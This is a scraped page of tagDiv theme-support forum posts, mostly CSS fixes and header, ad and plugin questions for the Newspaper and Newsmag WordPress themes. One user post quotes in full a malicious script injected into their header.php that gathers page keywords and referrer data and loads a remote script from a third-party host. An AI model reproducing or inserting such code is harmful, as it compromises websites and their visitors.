- NewspaperHeader Builder
- NewspaperHeader ads
- NewspaperHeader styles
- NewspaperSearch setup for custom post type
- NewspapertagDiv Composer – Website Manager
- NewspaperBookmark – Save For Later
- NewspaperWooCommerce: Happy “Add to Favorites!”
- NewspaperModal Popup
- NewspaperFlex Block Settings Guide
- NewspaperPosts Loop Element
- NewspaperHow to Add a Logo in Newspaper
- NewspaperDefault Category Settings
- NewspaperWhen tagDiv Composer is Not Working
- NewspapertagDiv Cloud Library Plugin
- NewspapertagDiv Composer Tutorial
- NewspaperUsing the Theme Translations with WPML
- NewspaperInstagram in Newspaper WordPress Theme
- NewspaperWeather Shortcode
- NewspaperThe Mobile Theme
- NewspaperLogin – How to Enable User Registration
Hi
Try this css in theme panel > custom code > custom css: http://screencast.com/t/DM8jfuJH
@media (max-width: 767px) {
.td-header-top-menu {
display: block;
}
.top-bar-style-1 .td-header-sp-top-widget {
float: none;
display: table;
margin-left: auto;
margin-right: auto;
}
}
Thanks!
Hi
We removed smooth scroll from the theme so there is not a dis-functionality from Visual Composer. I am not sure why the header disappear after the page goes to anchor the anchor link as I’ve test this on my side and it works fine.
Please provide the shortcode from Visual Composer via http://pastebin.com/ so I can have a closer look and maybe I can helps.
Thanks!
Hello!
How to make visible Top bar menu on mobile in Newsmag?
I tried with this code (works fine in Newspaper):
@media (max-width: 767px) {
.td-header-top-menu-full, .td-header-top-menu-full .td-header-sp-top-menu {
display: block !important;
}
.top-header-menu li a {
font-size: 12px !important;
margin-right: 5px;
}
}
But this code don’t have any effect in Newsmag. Thanks.
Best regards,
R.
Hi,
this issue is caused by the css you added to change the logo width. This css no longer applies to the homepage in newspaper 7 as the logo css was changed.
please use this code instead if you wish to change the logo dimentions:
.td-header-sp-logo img {
width:150px!important;
}
Thank you!
Hi,
The sorting option for the grid on the homepage can be found here: http://screencast.com/t/e3FwmPsGsg
As for the Google DFP we have not tested this type of ads so we are not sure if they will work or not. If the implementation method requires adding a part of the code in header.php, please add it in the mobile header.php as there are 2 theme so there are 2 files with the same name: http://screencast.com/t/Sjf0GdeD
Thank you!
Hi,
I meant restoring the header code to the default code of header style 7 if you have modifications in place, not changing the header style. if no modifications were made, please disable all plugins except visual composer, clear cache and reset cdn files. Also if you use a child theme, please try to activate the main theme and see if the problem is still there.
If you still have problems wit this, please send us an email at contact@tagdiv.com and provide wp-admin so we can login and inspect this issue. Also include a link to this topic so we can identify you.
Thank you!
HI
Try this css in theme panel > custom code > custom css: http://screencast.com/t/5dxjYZCbe1
.td-header-sp-top-widget {
float: right!important;
}
Thanks!
Since the malware occur in the header.php of your theme folder, this suggest that the theme have security issues. I would recommend you to consider contacting the theme developers for security hardening or to change to another theme.
In case you need any further assistance, please do not hesitate to contact us.
Kind Regards,
Jack Mason
Technical Support Team
FastComet.com
Hi there,
This page http://www.emprunter-malin.com/le-guide/ has anchors. The page used to smooth scroll to the anchors after the user clicks on the link, but since I updated WP Backery, the following happens :
1- the page goes directly to the anchor, without any smooth scroll.
2- after the page has gone to the anchor, the header diseappears.
There are no other plugin in conflict, I have already checked.
I downloaded WP Backery from the patch patch_2.3.1_3.0.
What did I do wrong ?
Thanks in advanced.
If I use widgets, how do I enter ad in header at the side of my logo. I am using Style 3
I have selected the option to have my logo centred and the menu centred underneath but my logo keeps appearing left aligned.
Ok got it, so i would like to achieve two things:
1.Change the default category the mobile theme uses from featured to something else say latest.
which file would i need to work on to change this?
2.incorporate Double clicks for publishers ad units.
Now i tested the theme with google adsense code and it worked perfectly mainly because its a one part ad tag code. But double clicks for publishers uses a two part code that is one set of code is placed in the header.php file of the theme and the other code in the ad slot. but when i try this with the mobile theme it does not work.
How can i accomplish this?
But I am using Block 1. not 13
My concern is the logo at the header. Also I noticed that the images lose their quality once uploaded to the library before placing them on the page.
hi, please help. i dont know what else i can do to stop this malware code.
everyday i have to manually remove it from theme folder header.php file.
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.schreibwaren-wetzlar.de/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://www.schreibwaren-wetzlar.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
i have fallowed everything found on wordpress.org blog to remove and prevent malware…
i removed all folders and files …except config file and wp-contents folder … and re-uploaded fresh wordpress files …
also … deleted all themes and plugins … and reinstalled …
i changed wordpress prefix wp to something else …
changed all passwords …etc ..
what am i missing ?
thanks
1. Social counter issue sloved.
2. I have not added any custom code for header or anything else in my theme. It is not theme default header, it is Header Style 7. But problem still there with large unnecessary gaps between LOGO and Menu.
Hello rishab55555,
If you want to move your banned ad below the menu bar on mobile, you will have to change the header template which has to correspond with your header used. For example, if you are using the header style 1 you will have to add the do_shortcode method in header-style-1.php like this -> http://screencast.com/t/jJhNqOvZ Also, please ensure that you have added an ad code in your custom AD 1 from the Theme panel -> http://screencast.com/t/56LI9Ya6oh6d
Hope this helps!
Thanks.
Hello guys,
1. How can I move my header title up to where the breadcrumbs are placed? I plan on moving my breadcrumbs to the bottom of my posts.
2. Is there a way to my sidebar to the bottom of posts when its in landscape? My old css doesn’t work anymore: @media (min-width: 768px) and (max-width: 1018px) {
.vc_column_container .post {
display: block !important;
width:100% !important;
}
}
3. Once I delete the search bar, how do I expand my ubermenu to reach span 4?
Hi,
1) your social counter is not updated that is why it does not show up. Newspaper 7 requires version 4.1 of the social counter. Please disable and delete files for your current social counter plugin and then install it again from here: http://screencast.com/t/SZshTPHj
2) Please remove any custom css you might have regarding the header or the logo and restore the header to the theme default.
Thank you!
Hi,
The block title hover color is set by the thme accent color. The title text color however can be changed for every block from block settings: https://forum.tagdiv.com/block-settings-guide/ or from the thme panel for all headers: http://screencast.com/t/U4XnCYqHqJlB
I hope this helps.
Thanks.
Hi,
For the icons, please remove any custom css you might have in place as the header css has been changed a bit and a h1 tag was added to the logo for seo purposes.
As for the social counter, you have not updated it. Please make sure you update your plugin by removing you currently installed one (disable and delete files) and install the new version from here: http://screencast.com/t/SZshTPHj
Thank you!
Hi,
If you want to add your own custom block coding skills are required. You can use the theme api system: https://forum.tagdiv.com/td_api_blockadd/
As for the difference between the 2 themes:
Both themes share the same core so their functionality and performances are similar. The main differences are in design/appearances and the content area width which slightly differs from one theme to another. Newspaper’s grid width is 1068px while Newsmag’s width is 1021px and the newsmag’s theme grid has been designed to support the borders you notice between sections of a page:http://screencast.com/t/pNkgzN1Kn8Y5
Other differences are also appear regarding features, some of the blocks are present on one and missing on the other, for example you could check the Features menu items from each theme live demo and see blocks, modules, post templates… are present in each theme and the design differences – http://screencast.com/t/p87JJpieJd
Also you can check the documentation for each theme, other features that may not be presented on the live demo(for example header templates) – https://forum.tagdiv.com/wordpress-information/ – https://forum.tagdiv.com/newsmag-newsmag-documentation/
You can check on our live demo all the Big Grid blocks available – http://demo.tagdiv.com/newspaper/big-grid-1/
If you want to customize one of them or even create a new block you will need custom work and unfortunately the time doesn’t allow us to provide any type of custom services you will need to hire a professional developer.
Thank you!
Hi,
The footer and header will go into boxed mode if you add a background image or color (white counts as a color)
Please reset this setting by pressing the clear button: http://screencast.com/t/w5nVKkHU
You can read more about backgrounds here: https://forum.tagdiv.com/background-introduction/
Thank you!
Hello
If you want to change the background-color for your menu items when you are hovering over these, you will have to use a bit of CSS code and place it in Theme panel->Cusotm CSS area.
The code is ->
.sf-menu ul .td-menu-item > a:hover, .sf-menu ul .sfHover > a, .sf-menu ul .current-menu-ancestor > a, .sf-menu ul .current-category-ancestor > a, .sf-menu ul .current-menu-item > a, .sf-menu > .current-menu-item > a:after, .sf-menu > .current-menu-ancestor > a:after, .sf-menu > .current-category-ancestor > a:after, .sf-menu > li:hover > a:after, .sf-menu > .sfHover > a:after, .td_block_mega_menu .td-next-prev-wrap a:hover, .td-mega-span .td-post-category:hover, .td-header-wrap .black-menu .sf-menu > li > a:hover, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .sfHover > a, .header-search-wrap .td-drop-down-search:after, .header-search-wrap .td-drop-down-search .btn:hover, .td-header-wrap .black-menu .sf-menu > .current-menu-item > a, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a {
background-color: blue!important;
}
The result -> http://screencast.com/t/QtaALwAm
If you refer to something else, please provide more details.
Thanks for the message!
Just to add onto my query, I have already tried different header styles, but I don’t want to change the current layout and with all other header Styles I am unable to get this type of header pattern.
Just let me know which file to make changes in and I can then edit it accordingly.
Looking forward for a revert and get this resolved.
1. My site is http://www.bollywoodmessenger.com
I have put all the correct information for all profiles but it is not working.
NOTE: It is working well with my other website with same information, so there is no mistake in information input.
2. I am using Header Style 7 but i don’t know why there is much gap between LOGO and MENU. How can i narrow this gap and shift MENU a little close to LOGO
NOTE: The alternative Header Style i liked is Header Style 12 but due no gradient in this Style i stick to Header Style 7.